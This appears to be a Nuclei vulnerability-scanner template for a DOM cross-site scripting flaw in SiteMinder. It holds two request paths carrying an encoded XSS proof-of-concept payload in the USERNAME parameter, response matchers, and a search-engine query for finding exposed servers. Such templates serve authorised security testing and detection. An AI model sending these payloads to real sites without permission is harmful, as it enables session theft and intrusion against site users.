id: siteminder-dom-xss

info:
  name: SiteMinder - DOM Cross-Site Scripting
  author: clarkvoss
  severity: high
  description: SiteMinder contains a cross-site scripting vulnerability in the document object model. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://blog.reigningshells.com/2019/12/reviving-old-cves-reflected-xss-in-ca.html
    - https://github.com/projectdiscovery/nuclei-templates/issues/2736
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    google-query: inurl:"smpwservices.fcc"
  tags: dom,xss,siteminder

http:
  - method: GET
    path:
      - '{{BaseURL}}/siteminderagent/forms/smpwservices.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7'
      - '{{BaseURL}}/siteminderagent/forms/smaceauth.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '\u003d\u0022confirm(document.domain)\u0022\u003e</B> you cannot access your'

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200

# digest: 490a00463044022011f69d57654145d054d51fc4e321f179926027f780602c80727ef46c0888154102202e1753e53b77b3869ea26ece2c77bc1bd8fbf8a951e840556c1cfb315b6d474e:922c64590222798bb761d5b6d8e72950
